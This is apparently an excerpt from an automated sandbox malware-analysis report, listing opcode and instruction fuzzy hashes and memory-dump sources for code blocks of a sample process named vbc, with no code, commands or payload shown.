                                                      • API String ID:
                                                      • Opcode ID: d244123f30f243535289e09fcfcd64994efd68212c59b93a93650ad078853667
                                                      • Instruction ID: 5093b1d43cabc32d6f093c30fbb7328bac98a3102bae11595dc7355ee40116c0
                                                      • Opcode Fuzzy Hash: d244123f30f243535289e09fcfcd64994efd68212c59b93a93650ad078853667
                                                      • Instruction Fuzzy Hash: 43A1B170B0071ADBDB25DF69C995BBAB7A6FF44328F144029EE46D7281DB34AC01CB51
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4dcae4d3d321868a96cebaba86b622425e23f853ed78db33effe121526fe9196
                                                      • Instruction ID: b79b9dfa929ab490641eadec44b5d12c8fbe9c61ef5d040ae876abe00b4b9164
                                                      • Opcode Fuzzy Hash: 4dcae4d3d321868a96cebaba86b622425e23f853ed78db33effe121526fe9196
                                                      • Instruction Fuzzy Hash: F9A1CF72A14621AFCB11DF18C981B2ABBF9FF4A714F410928F949DB260D734ED41CB92
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 643e5c09a9e72ad4c69a5a03c05e0293cd3698421c6faa6b59f7aeb0f2e46bfa
                                                      • Instruction ID: 00b7163cf2b2414eb91fddfb54ebb5fa3561c5cfc2cf535ddd44d2549d9b4025
                                                      • Opcode Fuzzy Hash: 643e5c09a9e72ad4c69a5a03c05e0293cd3698421c6faa6b59f7aeb0f2e46bfa
                                                      • Instruction Fuzzy Hash: 06B15B74A04205CFCF24CF19D491BA9BBB9BF48358F144599EE26EB291DB31DC82CB94
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4c68ed5d138873548d350d7b2dc558346baf99c4b0d65e32ef7e26d7689acd12
                                                      • Instruction ID: 9ad0b849150d858b0766d07d56f17d0e3e00753e6982f84dd6d9bfad57609d1f
                                                      • Opcode Fuzzy Hash: 4c68ed5d138873548d350d7b2dc558346baf99c4b0d65e32ef7e26d7689acd12
                                                      • Instruction Fuzzy Hash: BCB101756093408FD354CF28C584A6AFBE1BF88704F18496EF99ADB352D731E945CB42
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
                                                      • Instruction ID: 87f84c1322f497f4a5bc035f3daa27f16c7b8e3e06f97af0e37ceed7aa3a3454
                                                      • Opcode Fuzzy Hash: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
                                                      • Instruction Fuzzy Hash: B5719035A04A1A9BCF20CF64C582ABEBBB6BF04752F95419EEC41EB240E735DD418B90
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                      • Instruction ID: de93b7f5b3348d95cde5cfff38a5c9c3c0068d6fd3e338a74c796589d6cac91a
                                                      • Opcode Fuzzy Hash: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                                      • Instruction Fuzzy Hash: 62819B72E0521D9BDF14DF68C881BADFBB6FB84344F1985AADC16E7340D631AE408B91
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1887d6e6316d2a0f97df1bf5911aa960657311f71e3e03a9fbd355f54d8add3a
                                                      • Instruction ID: 77f8cab1e5bbac99ca28e949b0320966c4be92e16f87c91514e7dbe35259a8d0
                                                      • Opcode Fuzzy Hash: 1887d6e6316d2a0f97df1bf5911aa960657311f71e3e03a9fbd355f54d8add3a
                                                      • Instruction Fuzzy Hash: 60718775909229EFCB25CF59C894ABEBFB6FB48710F14451AEC52EB250E7309D40CBA0
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0a500d6593f3ff143e03441b5c629f52038304980b57168c30a8ea4e67b6c127
                                                      • Instruction ID: 84ee6884984467829b627095a945f657aab43f1f90c0fee0b112cd963317392b
                                                      • Opcode Fuzzy Hash: 0a500d6593f3ff143e03441b5c629f52038304980b57168c30a8ea4e67b6c127
                                                      • Instruction Fuzzy Hash: E7718E767086519FD311DF28C484B6ABBE6FF84214F0485AAEC9ACB351DB34DC86CB91
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1cfc76659034c7263fac1d0ae835d2d3c89eaa79135fe25e58956b2a2acd9391
                                                      • Instruction ID: ba1fd5feb2873b4779a0d6a6cbe1a7ceab6651d941986e1c0b69320ea9eebcf7
                                                      • Opcode Fuzzy Hash: 1cfc76659034c7263fac1d0ae835d2d3c89eaa79135fe25e58956b2a2acd9391
                                                      • Instruction Fuzzy Hash: 3161A971204715ABD715DF69C888BABFBE9BB88714F004619FC69C7240DB34AD05CBA2
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 65647462bb8ab98dfeac4f62974f1fa7fbeec33637d62df85611afb0cda06d86
                                                      • Instruction ID: fdb9672516eced30c2101589e21241141b84bc3d4a8e3f5ff874b735ccac23fe
                                                      • Opcode Fuzzy Hash: 65647462bb8ab98dfeac4f62974f1fa7fbeec33637d62df85611afb0cda06d86
                                                      • Instruction Fuzzy Hash: 227135B5E012099FCB14CFA9C541BACBBFABF48354F1980AAE855E7391D734AD41CB90
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8d523c6e1c4ebe31bcaa17d12756670619b444636bf431877320d17d4c0bb545
                                                      • Instruction ID: f5ff6bda9ea25a604198787cd8ce064ed28de9fe9c8f1764db315c2152661c26
                                                      • Opcode Fuzzy Hash: 8d523c6e1c4ebe31bcaa17d12756670619b444636bf431877320d17d4c0bb545
                                                      • Instruction Fuzzy Hash: 2A614D75A04606AFDB18DF68C484AADFBBAFF48204F14856EDC1AE7340DB34AD41CB94
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 53344eae0e2a2d28b388c93a80ba81ef83ceed74d855f4590e040c5fa7263bf9
                                                      • Instruction ID: 5fe7c6c47073ab9eca021be7c3cadfe51bdbb04f3ce299caaf46adbc981e118f
                                                      • Opcode Fuzzy Hash: 53344eae0e2a2d28b388c93a80ba81ef83ceed74d855f4590e040c5fa7263bf9
                                                      • Instruction Fuzzy Hash: 175191712093449FD720EF28CD85F6A7BA8EB85764F10062DFD16D7191DB319C41CBA2
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7a902c4b1b5fdeb423dcbd69a0341bbaf7489b83fbef5ffaa598eb2f693b6dcb
                                                      • Instruction ID: d019b235961dea1dcaadc33376056b22d0255b3e522b04413781e5910a2f0088
                                                      • Opcode Fuzzy Hash: 7a902c4b1b5fdeb423dcbd69a0341bbaf7489b83fbef5ffaa598eb2f693b6dcb
                                                      • Instruction Fuzzy Hash: C151AE71A0130CABEB219FA8CC85BADBBB9FF45300F20442AED95E7151EBB19C449F51
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8ed6520e873f18420321c83dbb4cbe63697f195efa62a910393bd4e8fb9dfd14
                                                      • Instruction ID: cf6b0e39e0e3ce0c2de190a89c26280ea4437eb6de6056ee94ab00dbe36e6877
                                                      • Opcode Fuzzy Hash: 8ed6520e873f18420321c83dbb4cbe63697f195efa62a910393bd4e8fb9dfd14
                                                      • Instruction Fuzzy Hash: FC51CD75A1466AAFC711CF68C491A69BBB1FF04710B058A69EC45DF740EB38ED91CB80
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 64973cfb59869989f4c4a7f1bd02bc976bf7cfba67df7d1243e952ef290c708d
                                                      • Instruction ID: 0bf10ccca2fe454a19d88790bac764eebfef9bef8c7220cb4f3dcfd8b1c8544e
                                                      • Opcode Fuzzy Hash: 64973cfb59869989f4c4a7f1bd02bc976bf7cfba67df7d1243e952ef290c708d
                                                      • Instruction Fuzzy Hash: 18516B71200A18DFCB21EF68C994E6AB7BEFF08654F510869ED56C7660DB34ED40CB52
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 414684df46b89a6b974b032c58cb81a4b00d5620809228c43dae33e4a2ecbec6
                                                      • Instruction ID: 553c9d24fd3ba5ea741c220a10ba91f401ad8751d62b205fb739a9d9e4a79a07
                                                      • Opcode Fuzzy Hash: 414684df46b89a6b974b032c58cb81a4b00d5620809228c43dae33e4a2ecbec6
                                                      • Instruction Fuzzy Hash: 4651AA31A04609EFEB15EB68C948BBDBBBAFF04359F104069EC12D7690EB749D01CB85
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                      • Instruction ID: 4f4f3926d6e483882562bdf3b278bdb8205f6402d4a5a0bfd712aaf72dfbc710
                                                      • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                      • Instruction Fuzzy Hash: B2517971E0821EABCF15DF98C449BAEBBBAAF45754F044069EE01EB250E734DD448BE4
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8d477af0a4b0cf3dea22eb2b80d31f39104faf7a40eae63782f43a78b03d5884
                                                      • Instruction ID: c05eadfb1b5f80be54f2a5a4d54fdc495373aeb00eb37c115db60842b951069c
                                                      • Opcode Fuzzy Hash: 8d477af0a4b0cf3dea22eb2b80d31f39104faf7a40eae63782f43a78b03d5884
                                                      • Instruction Fuzzy Hash: 2D518C31B15318DFDF21DAA8D848BADB7BABB85758F000018DC06EB240D7B5AD408F69
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 45753d72351bfe1d1ca3da8b3849be471285a4c34438019779af869f6d6016b7
                                                      • Instruction ID: f2f1ed1a4252e46a6c18938f4ed0501305cae64a32cd8770fc343f901e700fe7
                                                      • Opcode Fuzzy Hash: 45753d72351bfe1d1ca3da8b3849be471285a4c34438019779af869f6d6016b7
                                                      • Instruction Fuzzy Hash: 2B418476E0562DABDB11EBA88884ABFB7BDAF04654F050166ED01F7300DA38DD40CBE1
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b2c300d7f86a03933703e09635872856e70952263eb4647515a482bdea46eec2
                                                      • Instruction ID: e57bd8f09b9a644422166cf75383693dfd463ca5ebe839e9b91d13381669ae22
                                                      • Opcode Fuzzy Hash: b2c300d7f86a03933703e09635872856e70952263eb4647515a482bdea46eec2
                                                      • Instruction Fuzzy Hash: 86516D71200606EFCB15CF54C980A66BBB6FF46308F1585BAE808DF222E771ED85CB90
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 090a5d925608857c1d287f2b4b09d1f98b047ce43756aea9363a93376e49a8b9
                                                      • Instruction ID: 6775306ba1415e8ad2ed5d59182e35608abd28555aef7ad125bd6b6a5e0a2ce2
                                                      • Opcode Fuzzy Hash: 090a5d925608857c1d287f2b4b09d1f98b047ce43756aea9363a93376e49a8b9
                                                      • Instruction Fuzzy Hash: F441D3717883489FCB19EE6D9986F7A3B66EB44714F01182DFD42EB241EB719C00CB51
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c3cbab8c9b804168e8f96370714f8ddf008a0daadd68de2a3a47f9059cdaf989
                                                      • Instruction ID: d955073806017db448b7601f32bf7e6aa8eabbc7cadc211b80cd7d386c43d3cc
                                                      • Opcode Fuzzy Hash: c3cbab8c9b804168e8f96370714f8ddf008a0daadd68de2a3a47f9059cdaf989
                                                      • Instruction Fuzzy Hash: 6C51AC32309A998FC726CB18C444F6A73AABB44794F0909A5FC16CB6A1DB38DC40D766
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d4fa0e6058477b67d45c39cf2a1d76726e9edc489adae3f638bbaffbd4fd09ad
                                                      • Instruction ID: 5aa95af351028a7caf30816828438539b1cce879e3908fdacf499caf424a6bd5
                                                      • Opcode Fuzzy Hash: d4fa0e6058477b67d45c39cf2a1d76726e9edc489adae3f638bbaffbd4fd09ad
                                                      • Instruction Fuzzy Hash: FE41AD35A0022CDBCB15DF98C448AEEB7B5FF48714F14811AED1AEB240D739AC41CBA5
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                      • Instruction ID: 5209039bff650bc6195604773acfbdd59e208a1337bb622241e0fb948ff114df
                                                      • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                      • Instruction Fuzzy Hash: 80513A75A006158FCB18DF58C580ABDF7B6FF84724F1481AAD816E7390D734AE41CB90
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3d3f0938ac47abc6e8009b938749122899c0b2d3be8d42aa2d125f5285a70ccc
                                                      • Instruction ID: 799d73aa98771aa833f37e6b8612a838c0a7376cb8339991bd5eb45e1fc7ec9c
                                                      • Opcode Fuzzy Hash: 3d3f0938ac47abc6e8009b938749122899c0b2d3be8d42aa2d125f5285a70ccc
                                                      • Instruction Fuzzy Hash: 6C51C570A0421ADBDB25DB28CC04BB97BB6BF01314F1482A9DC69DB6D1EB349D81CF45
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 860a7db1c1ef5577a1afefc5c986dcd0e919c9d0de77abbdbbbc85ea93c6ae3c
                                                      • Instruction ID: 870b5a97496a2093be126de7babf037b0409f1b659e2cfca9cf8b775bb02e151
                                                      • Opcode Fuzzy Hash: 860a7db1c1ef5577a1afefc5c986dcd0e919c9d0de77abbdbbbc85ea93c6ae3c
                                                      • Instruction Fuzzy Hash: EE417AB1680705EFCB22EF68C885B2ABBA9FB00794F009429ED95DB290D770DC40CB91
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                      • Instruction ID: 9077a1a3505cee1109d59cd175c3c4e6e6484d3238bc4dcaae08d8f7c4f438e3
                                                      • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                      • Instruction Fuzzy Hash: 90418F75B04209ABDB15DB99C888ABFFBFABF88750F144069EC05E7345DA70DD018BA0
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8ae6edb2af2031ffbe61a43eac446f8a4777c18fbc762c90d9314e5b6fe3c8f6
                                                      • Instruction ID: 536621a6788323ed9576e4402284bacc978d15bf400ce73ffe7112e01b980d8f
                                                      • Opcode Fuzzy Hash: 8ae6edb2af2031ffbe61a43eac446f8a4777c18fbc762c90d9314e5b6fe3c8f6
                                                      • Instruction Fuzzy Hash: BA41BF31A08218CFCF18EFA8C4967A97BB5BF48314F040595E956EB290DB35DD40CBE1
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 876e1f10d0567d8413f7073a0371ba1f45d136acb55f069674e5d3c1a31c5ad1
                                                      • Instruction ID: 6fc6de134257cde2c376b7c61c6671ba60fad314dec933de93381c9a1ac7cc36
                                                      • Opcode Fuzzy Hash: 876e1f10d0567d8413f7073a0371ba1f45d136acb55f069674e5d3c1a31c5ad1
                                                      • Instruction Fuzzy Hash: 62419E752193049FD720EF69C995E6A7BA9EB85760F01492DFE19C7290CB30EC11CBE2
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                      • Instruction ID: 5e80bee2fee4955b4b06712672abe56a91c71b68427933d3fc33f3472dd929ca
                                                      • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                      • Instruction Fuzzy Hash: 42414C31B0431ADFDB68EF188844BBBB772FB5071AF15806AEC46DB291D6318D80CB91
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                      • Instruction ID: 829f30e03ca293496e11a1b388744dabff70918dcc9d7d75f66b52ac12681b71
                                                      • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                      • Instruction Fuzzy Hash: 57411775A04709EFDB24CF98C984AABB7F5FB08704B10496DEA56DB650E330AE44CF51
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: faa4564e4c95fbb35dc3ed04ecb09c6cb467219e33fb11253235b3f1d588a63f
                                                      • Instruction ID: a0246b204f6b94f772cc09599946425e2d7cf43d4fac4a7f51106322089b54cf
                                                      • Opcode Fuzzy Hash: faa4564e4c95fbb35dc3ed04ecb09c6cb467219e33fb11253235b3f1d588a63f
                                                      • Instruction Fuzzy Hash: E4419A75601704CFCB21EF29D944A6ABBBAFF44314F108AA9CC17DB6A0EB309D41CB46
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f9369b94f4850f25af01da7ecf37ebe010f8c6690d4fe45c69fe39309ed9793c
                                                      • Instruction ID: ff7864c8cedffff3d2539302ec9067352d4f1b5df2226a8aa29f144d692b4a1d
                                                      • Opcode Fuzzy Hash: f9369b94f4850f25af01da7ecf37ebe010f8c6690d4fe45c69fe39309ed9793c
                                                      • Instruction Fuzzy Hash: FD41AE72608785DBC725DF69C844A6AB7E9BFC8700F080A29FC95D7680E730ED04C7A6
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a49bc378c57aebf30a7a7d8f1c6911abae07f9cf7a54d1eb9b130a7b87d8f6de
                                                      • Instruction ID: 03eb844168efffd60fc56f3dc3b75a9c462b50005493d26b1fd58be57338632e
                                                      • Opcode Fuzzy Hash: a49bc378c57aebf30a7a7d8f1c6911abae07f9cf7a54d1eb9b130a7b87d8f6de
                                                      • Instruction Fuzzy Hash: 46318B31301A0AEFCB519B64CA85EA9BBAABF84258F405425ED01C7A50DB70EC20CFD5
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                                      • Instruction ID: 8af4ebde51a8252f7cb4b1da1cd22376a0f0b8654d8a7b41e70c2d80ef2c302f
                                                      • Opcode Fuzzy Hash: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
                                                      • Instruction Fuzzy Hash: FC31F7317083459BD721EA18C801B6BB7E6BB85754F48852AFC85CB390E378CC41C7D2
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Instruction Fuzzy Hash: A0215E76A40209DFCB14DF58C581A6EBBFAFB89718F24416DD905AB310CB71AD46CF90
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.1557586144.00000000057E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 057E0000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_57e0000_vbc.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
